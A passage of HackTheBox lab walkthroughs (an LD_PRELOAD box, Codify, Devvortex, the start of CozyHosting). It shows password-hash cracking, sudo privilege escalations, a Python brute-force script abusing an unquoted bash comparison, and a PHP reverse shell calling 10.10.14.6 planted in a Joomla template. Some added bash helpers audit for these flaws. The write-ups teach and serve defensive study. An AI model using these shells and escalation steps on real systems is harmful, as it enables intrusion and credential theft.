Warning: Permanently added '10.10.55.1' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa': 

So I need a passphrase. Use john to crack the passphrase from this key.

┌──(rootkali)-[/home/kali]
└─# ssh2john id_rsa > id_rsa.hash

┌──(rootkali)-[/home/kali]
└─# john -w=/usr/share/seclists/Passwords/Leaked-Databases/rockyou-75.txt id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
***********        (id_rsa)     
1g 0:00:00:26 DONE (2024-04-14 14:02) 0.03818g/s 36.65p/s 36.65c/s 36.65C/s 242424..marie1
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

SSH login

┌──(rootkali)-[/home/kali]
└─# ssh -i id_rsa saad@10.10.55.1                                                                 
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-135-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun 14 Apr 2024 06:03:58 PM UTC

  System load:  0.0               Processes:             115
  Usage of /:   57.5% of 8.02GB   Users logged in:       0
  Memory usage: 27%               IPv4 address for eth0: 10.10.55.1
  Swap usage:   0%


58 updates can be applied immediately.
33 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Nov  6 07:56:40 2023 from 192.168.8.102
saad@m4lware:~$ id
uid=1000(saad) gid=1000(saad) groups=1000(saad)
saad@m4lware:~$ 
saad@m4lware:~$ ls -la
total 52
drwxr-xr-x 7 saad saad 4096 Jan 21  2023 .
drwxr-xr-x 3 root root 4096 Jan 20  2023 ..
-rw------- 1 saad saad  362 Jan 21  2023 .bash_history
-rw-r--r-- 1 saad saad  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 saad saad 3797 Jan 21  2023 .bashrc
drwx------ 2 saad saad 4096 Jan 20  2023 .cache
drwx------ 3 saad saad 4096 Jan 20  2023 .gnupg
drwxrwxr-x 3 saad saad 4096 Jan 20  2023 .local
-rw-r--r-- 1 saad saad  807 Feb 25  2020 .profile
drwx------ 3 saad saad 4096 Jan 20  2023 snap
drwx------ 2 saad saad 4096 Jan 21  2023 .ssh
-rwxr-xr-x 1 root root  150 Jan 20  2023 start_server.py
-rw-r--r-- 1 saad saad    0 Jan 20  2023 .sudo_as_admin_successful
-rw-rw---- 1 saad saad   33 Jan 21  2023 user.txt

Privilege escalation

After poking around this user's home directory, I found credentials in .bash_history:

saad@m4lware:~$ cat .bash_history 
whoami
pwd
ls -al
ls
cd ..
sudo -l
echo "saad:******************$4291" > creds.txt
rm creds.txt
sudo -l
whomai
whoami
pwd
ls -al
sudo -l
ls -al
pwd
whoami
mysql -u root -p
netstat -antlp
mysql -u root
sudo su
ssh root@192.169.155.104
mysql -u user -p
mysql -u db_user -p
ls -ld /var/lib/mysql
ls -al
cat .bash_history 
cat .bash_logout 
nano .bashrc 
ls -al

Using them to look for more information:

saad@m4lware:~$ sudo -l
[sudo] password for saad: 
Matching Defaults entries for saad on m4lware:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, env_keep+=LD_PRELOAD

User saad may run the following commands on m4lware:
    (root) /usr/bin/ping

Note the env_keep+=LD_PRELOAD part. Searching for LD_PRELOAD privilege escalation, I found a guide right at the first link.

Following the guide, I got root:

saad@m4lware:~$ cd /tmp/
saad@m4lware:/tmp$ nano shell.c
saad@m4lware:/tmp$ gcc -shared -fPIC -o shell.so shell.c -nostartfiles
saad@m4lware:/tmp$ sudo LD_PRELOAD=/tmp/shell.so /usr/bin/ping
bash: fork: Resource temporarily unavailable
root@m4lware:/tmp# id
bash: fork: retry: Resource temporarily unavailable
root@m4lware:/tmp# exit
exit
sh: 1: Cannot fork
/usr/bin/lesspipe: 28: Cannot fork
root@m4lware:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@m4lware:/tmp# cd /root
root@m4lware:~# ls -la
total 44
drwx------  5 root root 4096 Nov  6 07:56 .
drwxr-xr-x 19 root root 4096 Dec  3  2022 ..
-rw-------  1 root root   48 Apr 14 18:57 .bash_history
-rw-r--r--  1 root root 3132 Jan 21  2023 .bashrc
drwxr-xr-x  3 root root 4096 Jan 20  2023 .cache
drwxr-xr-x  3 root root 4096 Jan 20  2023 .local
-rw-------  1 root root    1 Jan 21  2023 .mysql_history
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-------  1 root root    1 Jan 21  2023 .python_history
-rw-------  1 root root   33 Jan 21  2023 root.txt
drwx------  3 root root 4096 Jan 20  2023 snap
root@m4lware:~# 
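
The setting that made this escalation possible is the env_keep of a dynamic-loader variable. Below is an added audit helper, not part of the walkthrough, that scans sudoers text (or the Matching Defaults lines of sudo -l) for kept loader variables; the sudoers sample and the sudo -l line it is run on are constructed for the example.

```bash
#!/usr/bin/env bash
# Added audit helper (not from the walkthrough): flags sudoers Defaults that
# keep dynamic-loader variables across sudo. env_keep+=LD_PRELOAD is what let a
# user-controlled library ride into the root-owned ping on this box.
# Reads sudoers text, or the "Matching Defaults" lines of sudo -l, from stdin.
# Prints each kept dangerous variable; returns 0 if none, 1 if any were found.

DANGEROUS_ENV='LD_PRELOAD LD_LIBRARY_PATH LD_AUDIT PYTHONPATH PERL5OPT'

audit_env_keep() {
    local line rest word found=0
    local -a words
    while IFS= read -r line; do
        line="${line%%#*}"                         # drop comments
        [[ "$line" == *env_keep* ]] || continue    # only env_keep settings
        rest="${line#*env_keep}"                   # text after the keyword
        rest="${rest#"${rest%%[![:space:]]*}"}"    # trim leading whitespace
        [[ "$rest" == -=* ]] && continue           # env_keep -= removes, not keeps
        rest="${rest#*=}"                          # value after = or +=
        rest=$(printf '%s' "$rest" | tr '",' '  ') # quotes/commas become separators
        read -ra words <<< "$rest"
        for word in "${words[@]}"; do
            if [[ " $DANGEROUS_ENV " == *" $word "* ]]; then
                echo "env_keep retains $word"
                found=1
            fi
        done
    done
    [ "$found" -eq 0 ]
}

# Constructed sudoers fragment (not the box's real file): one kept pair of
# loader variables, one commented-out line, one removal that must not be flagged.
SUDOERS_SAMPLE='Defaults        env_reset
Defaults        mail_badpass
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
Defaults        env_keep += "LD_PRELOAD LD_LIBRARY_PATH"
# Defaults      env_keep += "PYTHONPATH"
Defaults        env_keep -= "LD_AUDIT"
saad ALL=(root) /usr/bin/ping'

# The same setting as sudo -l prints it (constructed to match the output above).
SUDO_L_SAMPLE='    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, env_keep+=LD_PRELOAD'
```

On a real host run it as printf '%s\n' "$(sudo -l)" | audit_env_keep, or over /etc/sudoers and /etc/sudoers.d/* as root; the fix is to delete the env_keep entry so sudo's default env_reset strips the variable.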

HackTheBox - Codify

  1. Reconnaissance and Scanning
  2. Enumeration
  3. User Flag
  4. Privilege Escalation

intro

Codify is an easy machine built around a vulnerability in a Node.js library to achieve RCE, and a bash scripting flaw to escalate privileges to root.

Reconnaissance and Scanning

PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 96:07:1c:c6:77:3e:07:a0:cc:6f:24:19:74:4d:57:0b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBN+/g3FqMmVlkT3XCSMH/JtvGJDW3+PBxqJ+pURQey6GMjs7abbrEOCcVugczanWj1WNU5jsaYzlkCEZHlsHLvk=
|   256 0b:a4:c0:cf:e2:3b:95:ae:f6:f5:df:7d:0c:88:d6:ce (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIm6HJTYy2teiiP6uZoSCHhsWHN+z3SVL/21fy6cZWZi
80/tcp   open  http    syn-ack Apache httpd 2.4.52
|_http-title: Codify
|_http-server-header: Apache/2.4.52 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
3000/tcp open  http    syn-ack Node.js Express framework
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Add the domain codify.htb to the hosts file.

sudo nano /etc/hosts

127.0.0.1       localhost
127.0.1.1       4nhHT.  4nhHT
10.10.11.239    codify.htb
# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Enumeration

Visit the web app on port 3000. After going through the site's pages, I found the exploitable part here:

one

Following the vm2 link, I found vm2 version 3.9.16. Searching for this version online, I found CVE-2023-30547. Following the steps of the PoC:

two

Swapping in a payload to get RCE:

three

User Flag

Searching through the files and directories under /var/www/, I found a db file.

svc@codify:~$ ls -la /var/www/contact
ls -la /var/www/contact
total 120
drwxr-xr-x 3 svc  svc   4096 Sep 12  2023 .
drwxr-xr-x 5 root root  4096 Sep 12  2023 ..
-rw-rw-r-- 1 svc  svc   4377 Apr 19  2023 index.js
-rw-rw-r-- 1 svc  svc    268 Apr 19  2023 package.json
-rw-rw-r-- 1 svc  svc  77131 Apr 19  2023 package-lock.json
drwxrwxr-x 2 svc  svc   4096 Apr 21  2023 templates
-rw-r--r-- 1 svc  svc  20480 Sep 12  2023 tickets.db
svc@codify:~$ cat /var/www/contact/tickets.db
cat /var/www/contact/tickets.db
T5��Tformat 3@  .WJ
       otableticketsticketsCREATE TABLE tickets (id INTEGER PRIMARY KEY AUTOINCREMENT, name TEXT, topic TEXT, description TEXT, status TEXT)P++Ytablesqlite_sequencesqlite_sequenceCREATE TABLE sqlite_sequence(name,seq)��     tableusersusersCREATE TABLE users (
        id INTEGER PRIMARY KEY AUTOINCREMENT,
        username TEXT UNIQUE,
        password TEXT
��Gjoshua$2a$12$SOn8Pf6z8fO/nVsNbAAequ************************
��
����ua  users
             ickets
r]rh%%Joe WilliamsLocal setup?I use this site lot of the time. Is it possible to set this up locally? Like instead of coming to this site, can I download this and set it up in my own computer? A feature like that would be nice.open ;wTom HanksNeed networking modulesI think it would be better if you can implement a way to handle network-based stuff. Would help me out a lot. Thanks!open
svc@codify:~$

I have the user joshua and this user's password hash. Copy it back and crack it with john.

┌──(neo4nhHT)-[~/HTB-Codify]
└─$ john -w=/usr/share/wordlists/rockyou.txt hash.txt
Created directory: /home/neo/.john
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 4096 for all loaded hashes
Will run 20 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
**********       (?)
1g 0:00:00:19 DONE (2024-03-24 22:09) 0.05122g/s 73.77p/s 73.77c/s 73.77C/s scotty..michel
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Log in over SSH as joshua.

┌──(neo4nhHT)-[~/HTB-Codify]
└─$ ssh joshua@10.10.11.239
The authenticity of host '10.10.11.239 (10.10.11.239)' can't be established.
ED25519 key fingerprint is SHA256:Q8HdGZ3q/X62r8EukPF0ARSaCd+8gEhEJ10xotOsBBE.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.239' (ED25519) to the list of known hosts.
joshua@10.10.11.239's password:
joshua@codify:~$ id
uid=1000(joshua) gid=1000(joshua) groups=1000(joshua)
joshua@codify:~$ ls
python.py  script.py  user.txt
joshua@codify:~$

Privilege Escalation

sudo -l

joshua@codify:~$ sudo -l
[sudo] password for joshua:
Matching Defaults entries for joshua on codify:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User joshua may run the following commands on codify:
    (root) /opt/scripts/mysql-backup.sh
joshua@codify:~$ cat /opt/scripts/mysql-backup.sh
#!/bin/bash
DB_USER="root"
DB_PASS=$(/usr/bin/cat /root/.creds)
BACKUP_DIR="/var/backups/mysql"

read -s -p "Enter MySQL password for $DB_USER: " USER_PASS
/usr/bin/echo

if [[ $DB_PASS == $USER_PASS ]]; then
        /usr/bin/echo "Password confirmed!"
else
        /usr/bin/echo "Password confirmation failed!"
        exit 1
fi

/usr/bin/mkdir -p "$BACKUP_DIR"

databases=$(/usr/bin/mysql -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" -e "SHOW DATABASES;" | /usr/bin/grep -Ev "(Database|information_schema|performance_schema)")

for db in $databases; do
    /usr/bin/echo "Backing up database: $db"
    /usr/bin/mysqldump --force -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" "$db" | /usr/bin/gzip > "$BACKUP_DIR/$db.sql.gz"
done

/usr/bin/echo "All databases backed up successfully!"
/usr/bin/echo "Changing the permissions"
/usr/bin/chown root:sys-adm "$BACKUP_DIR"
/usr/bin/chmod 774 -R "$BACKUP_DIR"
/usr/bin/echo 'Done!'
joshua@codify:~$

Analysing this bash script and reading up online, I found a flaw in the comparison of DB_PASS and USER_PASS, known as an unquoted variable comparison; it concerns the double equals sign ==.

Put simply, in bash, if the right-hand side of == inside [[ ]] is not quoted, bash performs pattern matching instead of a string comparison. In this case we can match any character followed by any number of characters, for example a******, AB*****.

Using this bug, I wrote a simple Python script to test the password, with the straightforward logic of trying one character at a time for each position of the password, followed by a wildcard for any number of characters.
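
As an added demonstration that is not part of the walkthrough: the comparison from mysql-backup.sh next to a quoted version, run against a constructed secret (the partial value this page recovers later). count_accepted_probes shows that the unquoted form accepts a correct prefix followed by * at every length, which is exactly the one-character-at-a-time oracle.

```bash
#!/usr/bin/env bash
# Demo secret: the partial value recovered later on this page, used here as
# constructed input for the example (the real credential is not on the page).
DEMO_SECRET='kljh12k3jhaskjh12k'

# Vulnerable form, as in mysql-backup.sh: the unquoted right-hand side of ==
# inside [[ ]] is treated as a glob pattern, so "k*" matches any secret that
# starts with "k". Returns 0 on match, 1 otherwise.
check_unquoted() {
    local secret="$1" guess="$2"
    [[ $secret == $guess ]]
}

# Hardened form: quoting the right-hand side makes == a literal string
# comparison, so "k*" only matches the two-character string k*.
check_quoted() {
    local secret="$1" guess="$2"
    [[ "$secret" == "$guess" ]]
}

# Feed every correct prefix of the secret, followed by "*", to the given
# checker and count how many are accepted. With check_unquoted every prefix
# passes (the oracle the walkthrough's script relies on); with check_quoted
# none does.
count_accepted_probes() {
    local secret="$1" checker="$2" n=0 i
    for ((i = 1; i <= ${#secret}; i++)); do
        if "$checker" "$secret" "${secret:0:i}*"; then
            n=$((n + 1))
        fi
    done
    echo "$n"
}
```

Quoting closes the pattern-match oracle, but the script still reads the root password into a variable and compares it in plaintext; comparing a hash of the input would be the fuller fix.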

import string
import os

# Candidate alphabet: the script assumes the password is letters and digits only
chars = string.ascii_letters + string.digits
password = ''
found = True

# Extend the known prefix one character at a time. The exit status of the
# sudo script (0 = "Password confirmed!") is the oracle: because it compares
# with an unquoted [[ $DB_PASS == $USER_PASS ]], prefix + c + "*" is accepted
# whenever c is the next character of the real password.
while found:
    found = False
    for i in chars:
        errorlevel = os.system("echo " + password + i + "* | sudo /opt/scripts/mysql-backup.sh >/dev/null 2>&1")
        if errorlevel == 0:
            password = password + i
            print("[+] new character found: " + password)
            found = True
            break
print("[+] done, root password is: " + password)

Create a file exploit.py on the codify machine, paste the code above, save it and run it.

joshua@codify:~$ nano exploit.py
joshua@codify:~$ python3 exploit.py
[sudo] password for joshua:
[+] new character found: k
[+] new character found: kl
[+] new character found: klj
[+] new character found: kljh
[+] new character found: kljh1
[+] new character found: kljh12
[+] new character found: kljh12k
[+] new character found: kljh12k3
[+] new character found: kljh12k3j
[+] new character found: kljh12k3jh
[+] new character found: kljh12k3jha
[+] new character found: kljh12k3jhas
[+] new character found: kljh12k3jhask
[+] new character found: kljh12k3jhaskj
[+] new character found: kljh12k3jhaskjh
[+] new character found: kljh12k3jhaskjh1
[+] new character found: kljh12k3jhaskjh12
[+] new character found: kljh12k3jhaskjh12k
[+] new character found: *******************
[+] new character found: ********************
[+] new character found: *********************
[+] done, root password is: **********************
joshua@codify:~$

Log in as root.

joshua@codify:~$ su root
Password:
root@codify:/home/joshua# id
uid=0(root) gid=0(root) groups=0(root)
root@codify:/home/joshua# ls /root
root.txt  scripts
root@codify:/home/joshua#

HackTheBox - Devvortex

  1. Reconnaissance and Scanning
  2. Enumeration
  3. User Flag
  4. Privilege Escalation

info

Devvortex is a simple machine that revolves around applying vulnerabilities with existing PoCs to get RCE on Joomla CMS, retrieving a user's password from MySQL, and escalating privileges with apport-cli.

Reconnaissance and Scanning

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://devvortex.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Add devvortex.htb to /etc/hosts so the name resolves to 10.10.11.242.

nano /etc/hosts

10.10.11.242 devvortex.htb

Visit http://devvortex.htb and try the simple ways of gathering basic information about this web server: robots.txt, index.php, etc. Nothing worthwhile turned up, so I tried enumerating subdomains, since there must be a reason a domain was provided.

┌──(rootkali)-[/home/neo]
└─# ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u http://devvortex.htb -H "Host: FUZZ.devvortex.htb" -fs 154

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://devvortex.htb
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
 :: Header           : Host: FUZZ.devvortex.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 154
________________________________________________

dev                     [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 122ms]

Add the subdomain to the hosts file.

nano /etc/hosts

10.10.11.242 devvortex.htb dev.devvortex.htb

Visit http://dev.devvortex.htb. Use Wappalyzer to check what the site is built with.


Enumeration

Check the Joomla version.


Searching for vulnerabilities in Joomla 4.2.6, I found CVE-2023-23752; I git-cloned an exploit for it and ran it.

┌──(rootkali)-[/home/neo]
└─# ruby exploit.rb http://dev.devvortex.htb 
Users
[649] lewis (lewis) - lewis@devvortex.htb - Super Users
[650] logan paul (logan) - logan@devvortex.htb - Registered

Site info
Site name: Development
Editor: tinymce
Captcha: 0
Access: 1
Debug status: false

Database info
DB type: mysqli
DB host: localhost
DB user: lewis
DB password: ******************
DB name: joomla
DB prefix: sd4fg_
DB encryption 0

So I now know the server has two users, lewis and logan, and I also have lewis's credentials.

Go to http://dev.devvortex.htb/administrator/ to log in as lewis.

To get RCE, a reverse shell can be added to one of the template's PHP files.

System -> Site templates -> Cassiopeia Details and Files, pick one of the existing files and replace its content with your reverse shell. I chose the shell below:

exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.6/9001 0>&1'");

Start nc: nc -lnvp 9001

Save the file and browse to the path of the file just modified.


http://dev.devvortex.htb/templates/cassiopeia/error.php

┌──(rootkali)-[/home/kali/HTB/Devvortex]
└─# nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.77] from (UNKNOWN) [10.10.11.242] 60634
bash: cannot set terminal process group (855): Inappropriate ioctl for device
bash: no job control in this shell
www-data@devvortex:~/dev.devvortex.htb/templates/cassiopeia$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@devvortex:~/dev.devvortex.htb/templates/cassiopeia$ 

User Flag

Going back to the initial information, I have a set of MySQL credentials. So I will try logging in to MySQL from this shell.

www-data@devvortex:~/dev.devvortex.htb/templates/cassiopeia$ mysql -h localhost -u lewis -p                   
<emplates/cassiopeia$ mysql -h localhost -u lewis -p         
Enter password:
....
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| joomla             |
| performance_schema |
+--------------------+
3 rows in set (0.00 sec)

mysql> use joomla;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> select username,password from sd4fg_users;
+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| lewis    | $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u |
| logan    | ---------------------------------------------------/yBtkIj12 |
+----------+--------------------------------------------------------------+
2 rows in set (0.00 sec)

So I found logan's password hash here. Copy this hash back to my machine and use john to crack it.

┌──(rootkali)-[/home/kali/HTB/Devvortex]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt                
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
*************    (?)     
1g 0:00:00:08 DONE (2024-03-17 11:30) 0.1239g/s 178.4p/s 178.4c/s 178.4C/s lacoste..michel
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

SSH login

┌──(rootkali)-[/home/kali/HTB/Devvortex]
└─# ssh logan@10.10.11.242
logan@10.10.11.242's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-167-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun 17 Mar 2024 03:29:10 PM UTC

  System load:  0.0               Processes:             197
  Usage of /:   67.7% of 4.76GB   Users logged in:       0
  Memory usage: 24%               IPv4 address for eth0: 10.10.11.242
  Swap usage:   0%

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sun Mar 17 09:12:48 2024 from 10.10.14.25
logan@devvortex:~$ id
uid=1000(logan) gid=1000(logan) groups=1000(logan)
logan@devvortex:~$ ls
final  getroot  new  user.txt
logan@devvortex:~$ 

Privilege Escalation

logan@devvortex:~$ sudo -l
[sudo] password for logan: 
Matching Defaults entries for logan on devvortex:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User logan may run the following commands on devvortex:
    (ALL : ALL) /usr/bin/apport-cli

apport is an Ubuntu service that collects crash and system information; details are in its documentation. Check the version of this apport-cli:

logan@devvortex:~$ /usr/bin/apport-cli -v
2.20.11

After searching online for vulnerabilities in apport-cli 2.20.11, I found CVE-2023-1326.

First I will create a crash file.

logan@devvortex:~$ sleep 30  &
[1] 5471
logan@devvortex:~$ killall -SIGSEGV sleep
logan@devvortex:~$ cd /var/crash/
[1]+  Segmentation fault      (core dumped) sleep 30  (wd: ~)
(wd now: /var/crash)
logan@devvortex:/var/crash$ ll
total 40
drwxrwxrwt  2 root  root   4096 Mar 17 15:50 ./
drwxr-xr-x 13 root  root   4096 Sep 12  2023 ../
-rw-rw-r--  1 logan logan     0 Mar 17 14:04 some_crash_file.crash
-rw-r-----  1 logan logan 30238 Mar 17 15:50 _usr_bin_sleep.1000.crash
logan@devvortex:/var/crash$ 

Run apport-cli with the -c option to create a report.

logan@devvortex:/var/crash$ sudo /usr/bin/apport-cli -c /var/crash/_usr_bin_sleep.1000.crash 

*** Send problem report to the developers?

After the problem report has been sent, please fill out the form in the
automatically opened web browser.

What would you like to do? Your options are:
  S: Send report (29.9 KB)
  V: View report
  K: Keep report file for sending later or copying to somewhere else
  I: Cancel and ignore future crashes of this program version
  C: Cancel
Please choose (S/V/K/I/C): V

*** Collecting problem information

The collected information can be sent to the developers to improve the
application. This might take a few minutes.

Enter !/bin/bash to get a shell from this process.

................................ERROR: Cannot update /var/crash/_usr_bin_sleep.1000.crash: [Errno 13] Permission denied: '/var/crash/_usr_bin_sleep.1000.crash'
...........................
root@devvortex:/var/crash#
root@devvortex:/var/crash# id
uid=0(root) gid=0(root) groups=0(root)
root@devvortex:/var/crash# ls -la /root
total 40
drwx------  6 root root 4096 Mar 17 09:43 .
drwxr-xr-x 19 root root 4096 Oct 26 15:12 ..
lrwxrwxrwx  1 root root    9 Jan 20  2021 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Dec  5  2019 .bashrc
drwx------  2 root root 4096 Feb 26 14:30 .cache
drwxr-xr-x  3 root root 4096 Oct 29 16:21 .cleanup
-rw-------  1 root root   38 Mar 17 09:43 .lesshst
drwxr-xr-x  3 root root 4096 Feb 26 14:30 .local
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-r-----  1 root root   33 Mar 17 06:39 root.txt
drwx------  2 root root 4096 Oct 26 15:12 .ssh
root@devvortex:/var/crash# 

HackTheBox - CozyHosting

  1. Reconnaissance and Scanning
  2. Enumeration
  3. RCE
  4. SSH
  5. Privilege escalation

intro

Reconnaissance and Scanning

PORT      STATE SERVICE   REASON         VERSION
22/tcp    open  ssh       syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4356bca7f2ec46ddc10f83304c2caaa8 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEpNwlByWMKMm7ZgDWRW+WZ9uHc/0Ehct692T5VBBGaWhA71L+yFgM/SqhtUoy0bO8otHbpy3bPBFtmjqQPsbC8=
|   256 6f7a6c3fa68de27595d47b71ac4f7e42 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHVzF8iMVIHgp9xMX9qxvbaoXVg1xkGLo61jXuUAYq5q
80/tcp    open  http      syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://cozyhosting.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
8000/tcp  open  http-alt? syn-ack ttl 63
8083/tcp  open  us-srv?   syn-ack ttl 63
12345/tcp open  netbus?   syn-ack ttl 63
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Add the host to /etc/hosts to reach the web server.

127.0.0.1       localhost
127.0.1.1       kali
10.10.11.230    cozyhosting.htb
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters

Use nuclei to scan the site.

┌──(rootkali)-[/home/kali]
└─# nuclei -u http://cozyhosting.htb

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v2.9.10

                projectdiscovery.io

[WRN] Found 1 templates with syntax error (use -validate flag for further examination)
[INF] Current nuclei version: v2.9.10 (outdated)
[INF] Current nuclei-templates version: v9.6.4 (latest)
[INF] New templates added in latest release: 121
[INF] Templates loaded for current scan: 6893
[INF] Targets loaded for current scan: 1
[INF] Templates clustered: 1202 (Reduced 1141 Requests)
[nginx-version] [http] [info] http://cozyhosting.htb [nginx/1.18.0]
[INF] Using Interactsh Server: oast.site
[tech-detect:bootstrap] [http] [info] http://cozyhosting.htb
[tech-detect:google-font-api] [http] [info] http://cozyhosting.htb
[tech-detect:nginx] [http] [info] http://cozyhosting.htb
[dns-saas-service-detection] [dns] [info] cozyhosting.htb
[springboot-actuator:available-endpoints] [http] [info] http://cozyhosting.htb/actuator [self,sessions,beans,env,env-toMatch,health,health-path,mappings]
[options-method] [http] [info] http://cozyhosting.htb [GET,HEAD,OPTIONS]
[springboot-env] [http] [low] http://cozyhosting.htb/actuator/env
[http-missing-security-headers:cross-origin-opener-policy] [http] [info] http://cozyhosting.htb
[http-missing-security-headers:cross-origin-resource-policy] [http] [info] http://cozyhosting.htb
[http-missing-security-headers:strict-transport-security] [http] [info] http://cozyhosting.htb
[http-missing-security-headers:permissions-policy] [http] [info] http://cozyhosting.htb
[http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] http://cozyhosting.htb
[http-missing-security-headers:cross-origin-embedder-policy] [http] [info] http://cozyhosting.htb
[http-missing-security-headers:content-security-policy] [http] [info] http://cozyhosting.htb
